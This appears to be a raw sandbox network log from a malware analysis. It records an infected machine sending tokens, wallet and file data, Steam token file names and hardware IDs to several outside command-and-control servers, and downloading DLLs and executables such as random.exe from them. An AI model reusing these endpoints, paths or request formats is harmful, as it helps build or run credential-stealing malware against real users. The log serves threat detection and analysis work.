Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BGHJEBKJEGHJKECAAKJKHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 47 48 4a 45 42 4b 4a 45 47 48 4a 4b 45 43 41 41 4b 4a 4b 2d 2d 0d 0a Data Ascii: ------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------BGHJEBKJEGHJKECAAKJKContent-Disposition: form-data; name="file"------BGHJEBKJEGHJKECAAKJK--
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/freebl3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/mozglue.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/msvcp140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/nss3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/softokn3.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1Host: 185.215.113.206Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----CAAAFCAKKKFBFIDGDBFHHost: 185.215.113.206Content-Length: 1067Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----FHJEGIIEGIDGIDHJDAKFHost: 185.215.113.206Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 46 48 4a 45 47 49 49 45 47 49 44 47 49 44 48 4a 44 41 4b 46 2d 2d 0d 0a Data Ascii: ------FHJEGIIEGIDGIDHJDAKFContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------FHJEGIIEGIDGIDHJDAKFContent-Disposition: form-data; name="message"wallets------FHJEGIIEGIDGIDHJDAKF--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IECBAFCAAKJDHJKFIEBGHost: 185.215.113.206Content-Length: 265Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 43 42 41 46 43 41 41 4b 4a 44 48 4a 4b 46 49 45 42 47 2d 2d 0d 0a Data Ascii: ------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------IECBAFCAAKJDHJKFIEBGContent-Disposition: form-data; name="message"files------IECBAFCAAKJDHJKFIEBG--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFCBFHJDHJKECAKEHIHost: 185.215.113.206Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 43 42 46 48 4a 44 48 4a 4b 45 43 41 4b 45 48 49 2d 2d 0d 0a Data Ascii: ------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------BAKFCBFHJDHJKECAKEHIContent-Disposition: form-data; name="file"------BAKFCBFHJDHJKECAKEHI--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKKKEHDHCBFIEBFBGIDHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 79 62 6e 63 62 68 79 6c 65 70 6d 65 0d 0a 2d 2d 2d 2d 2d 2d 44 42 4b 4b 4b 45 48 44 48 43 42 46 49 45 42 46 42 47 49 44 2d 2d 0d 0a Data Ascii: ------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------DBKKKEHDHCBFIEBFBGIDContent-Disposition: form-data; name="message"ybncbhylepme------DBKKKEHDHCBFIEBFBGID--
Source: global traffic HTTP traffic detected: GET /mine/random.exe HTTP/1.1Host: 185.215.113.16Cache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 2d 2d 0d 0a Data Ascii: ------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AAEBAKKJKKEBKFIDBFBA--
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----AAEBAKKJKKEBKFIDBFBAHost: 185.215.113.206Content-Length: 272Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 32 62 34 36 62 36 34 65 31 62 39 65 38 32 36 36 32 30 63 37 63 33 63 64 38 61 63 38 35 37 37 36 62 37 66 39 37 30 32 38 34 65 35 34 66 36 36 35 32 61 35 66 33 32 39 64 63 33 34 31 31 39 36 31 33 62 64 31 30 33 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 41 41 45 42 41 4b 4b 4a 4b 4b 45 42 4b 46 49 44 42 46 42 41 2d 2d 0d 0a Data Ascii: ------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="token"bb2b46b64e1b9e826620c7c3cd8ac85776b7f970284e54f6652a5f329dc34119613bd103------AAEBAKKJKKEBKFIDBFBAContent-Disposition: form-data; name="message"wkkjqaiaxkhb------AAEBAKKJKKEBKFIDBFBA--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 154Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 33 42 34 45 46 41 38 45 44 43 38 32 36 39 33 34 30 31 39 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 36 32 37 37 35 42 35 35 43 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C83B4EFA8EDC826934019B140BE1D46450FC9DDF642E3BDD70A7CB62775B55C82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
Source: global traffic HTTP traffic detected: GET /files/random.exe HTTP/1.1Host: 31.41.244.11
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 35 30 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008250001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /LCXOUUtXgrKhKDLYSbzW1732019347 HTTP/1.1Host: home.fvtekk5pn.topAccept: */*
Source: global traffic HTTP traffic detected: GET /luma/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 35 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008251001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /steam/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 35 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008252001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /well/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCAAKFBAEHJJJJDHIEHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 38 37 42 34 42 30 35 45 33 46 33 32 33 35 31 31 34 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 43 41 41 4b 46 42 41 45 48 4a 4a 4a 4a 44 48 49 45 2d 2d 0d 0a Data Ascii: ------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="hwid"7687B4B05E3F3235114199------KKFCAAKFBAEHJJJJDHIEContent-Disposition: form-data; name="build"mars------KKFCAAKFBAEHJJJJDHIE--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 35 33 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008253001&unit=246122658369
Source: global traffic HTTP traffic detected: GET /off/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 463Content-Type: multipart/form-data; boundary=------------------------jbau9hxrAKydOQrcdExHrEData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6a 62 61 75 39 68 78 72 41 4b 79 64 4f 51 72 63 64 45 78 48 72 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 57 75 67 6f 76 6f 73 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 5e 60 88 fe 4e 09 17 a5 a7 dc 44 26 fb ed cb 02 93 cf 0e dc c4 da d5 7f c3 74 1a 04 39 a6 e6 1d 3f 20 7c 95 b4 6d 19 f3 6b 2f e8 83 d5 a0 f8 bc 02 96 ea 4e d9 4f 37 73 bd 18 3a 3a 16 47 dd c7 ad 68 89 d1 f9 4d 0c ab a7 84 87 8e 03 df c3 b1 7a bd 43 a5 99 d2 a3 48 ed e8 7d de 7a 1e 11 17 bf a0 fe 09 fb 2f 4d 16 02 95 41 76 88 a7 b0 2d d3 71 db ed db 75 6b c5 76 78 59 dc 6e 4e bd 3c 25 e9 40 f6 4d 1f 27 6d d9 20 81 fb 84 71 0e 9b d9 e1 d4 d5 59 79 1a 7f 7b 1b 28 d1 6a 68 bb c1 af 28 c4 8c ed bf d3 b8 c0 99 b6 1b 5a f1 d3 15 7b 80 03 45 87 78 fa e8 92 1a 6e dd 2a 86 d1 cc 6a 13 cf 2f 27 21 70 21 93 e8 f3 55 c7 f4 68 80 ab b3 39 a7 9c 50 68 53 25 87 cb 69 dd f3 93 a7 94 1a db 8f f1 55 b9 b5 8d 21 ce c7 32 63 55 d3 40 37 72 51 f4 70 90 5b 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6a 62 61 75 39 68 78 72 41 4b 79 64 4f 51 72 63 64 45 78 48 72 45 2d 2d 0d 0a Data Ascii: --------------------------jbau9hxrAKydOQrcdExHrEContent-Disposition: form-data; name="file"; filename="Wugovos.bin"Content-Type: application/octet-stream^`ND&t9? |mk/NO7s::GhMzCH}z/MAv-qukvxYnN<%@M'm qYy{(jh(Z{Exn*j/'!p!Uh9PhS%iU!2cU@7rQp[--------------------------jbau9hxrAKydOQrcdExHrE--
Source: global traffic HTTP traffic detected: POST /v1/upload.php HTTP/1.1Host: fvtekk5pn.topAccept: */*Content-Length: 71671Content-Type: multipart/form-data; boundary=------------------------m2QorkCQ39oPmNi0A2wAwLData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 6d 32 51 6f 72 6b 43 51 33 39 6f 50 6d 4e 69 30 41 32 77 41 77 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4c 65 6b 65 63 69 62 2e 62 69 6e 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a cd 8c 43 f6 16 cd 5c 70 18 01 b0 02 12 ca 82 82 08 07 03 8e f5 12 42 0e 66 82 40 2a 2c dd c9 1d 43 8a 9c 74 71 a3 cd c6 4d b1 8d 23 fc a5 8a ef 80 3a 10 68 cf 5f 29 0d 83 d0 a2 93 86 2b 69 df 25 d5 8e 67 53 d0 3f d3 87 a9 e0 a8 2c 71 c6 f8 5a 51 3b e7 c4 ee 7c 5a e1 6b 7b b7 05 8a 28 74 70 17 06 74 73 a9 ae 01 60 27 cc 36 21 9a 41 41 c1 e3 b1 88 f6 97 25 b3 ef f8 4c f6 ca a6 8f 34 1b 27 99 46 5c c4 00 bf 1d 36 d6 b7 57 e2 05 10 dc 18 35 df 9e 26 ae 37 25 db eb 26 5b 75 87 74 22 c9 33 cc 57 92 a7 a8 71 03 93 37 2e bf 30 73 a7 d0 11 33 47 0f 37 92 74 86 a2 77 53 ae 73 68 4b fa f2 c7 da 0a 4f 52 66 c2 05 a4 b3 01 c5 ee b6 ab a1 65 de f1 f1 03 9a 67 2f 4e 84 7b e0 f6 96 ba 0f eb 91 a6 bc 4d 5d d0 d0 53 f9 c3 2c ba ef 48 b7 fa ba d5 aa 14 dd 29 a0 a7 4a 51 1b bd 14 57 c1 2e 8e 19 32 69 84 82 d4 e0 ad 1d 50 05 c8 b3 f9 5a 34 79 19 90 a8 f2 94 45 28 17 14 9a 4a a8 63 87 82 6c de 0f 88 00 e1 de df 41 eb e9 1a 14 41 7d ee 18 70 f8 1b d2 93 56 bd 5f 85 fe 37 aa 70 ed 6c 99 f3 ed ba bf 85 ff 99 88 af 6e eb 44 70 0b 88 1a 66 a0 be f9 36 c6 ed 2c 7f b8 db 12 f2 ef 6e 00 db 44 49 89 38 e9 87 07 3f 25 b5 f9 c3 e8 7a 1a 95 62 b9 09 50 54 aa 27 08 58 b8 06 3f 66 ca 9b 8b 99 21 3a a4 69 d7 c5 f6 2e 00 2f 77 39 56 f2 b1 79 42 38 23 e0 ab 85 b7 c5 0a b9 a6 46 e4 40 26 71 86 79 c1 bc ac 43 82 b8 f9 17 a6 a5 bb d9 65 ae 60 02 43 94 20 95 0b 0b f9 21 8f 95 cd 7b 88 62 c8 c9 c0 d3 59 28 94 b3 1b 71 dc 62 d8 06 9e 9d 29 51 aa 97 b8 2f f9 60 42 11 1c 96 3c 77 c1 ce 64 81 1f 60 42 4b 94 84 4c e8 72 d4 52 bb 1e cc fe d5 1f b9 4a 14 40 9a 5a 9a 1d 65 69 9c 32 c0 8d 94 b2 46 cf 57 a2 92 f0 41 10 77 3f 94 4b 77 3d e6 fe be b0 09 78 e5 a5 ca 16 c4 72 81 a8 6d d0 3a df 47 24 c2 53 76 80 b5 de 9e 8c 4d 5d 4c b2 13 06 2a 1f 97 62 39 18 32 f1 2e e3 be a9 42 ab b4 14 c4 3b 09 7c 91 30 0a 42 07 39 5d 8f 4e 31 83 b5 c7 40 58 c3 59 6b 2c 2d e9 ba b8 4a dd b3 72 a2 e4 1a 29 75 6a 71 16 72 69 39 af 7b 37 2b 49 9a 5f a9 0f 5d fa ec 02 f6 6a b1 af 3b 48 2f bb 1f c7 0f 8a ed 5f b7 4e d4 29 7a a1 01 5a 92 2d e9 42 32 d6 ca 9a 85 35 cf ea a4 46 5d f2 da be 36 d9 d6 2f df 3f 0d b0 e5 62 6e 38 51 6f 76 8c b5 32 2d 37 5b 95 e1 ed 11 08 0d 2e b1 82 af 66 9e 25 24 59 3b 00 97 3e cb 2f 82 79 2e fa e7 e1 00 36 cd 41 26 11 6d 8e e0 e8 d6 be 84 ad 42 ba bf 93 7c 95 9a 01 44 e9 5a 79 2e f8 77 f2 de 2a 53 3f 4d 42 3d 6e 1a 0d f5 32 6e 30 c0 fb
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 38 32 35 34 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1008254001&unit=246122658369
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.206Connection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: POST /c4becf79229cb002.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIJDBGDGCGDAKFIDGIDBHost: 185.215.113.206Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 36 38 37 42 34 42 30 35 45 33 46 33 32 33 35 31 31 34 31 39 39 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 4a 44 42 47 44 47 43 47 44 41 4b 46 49 44 47 49 44 42 2d 2d 0d 0a Data Ascii: ------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="hwid"7687B4B05E3F3235114199------IIJDBGDGCGDAKFIDGIDBContent-Disposition: form-data; name="build"mars------IIJDBGDGCGDAKFIDGIDB--
Source: global traffic HTTP traffic detected: POST /Zu7JuNko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.43Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
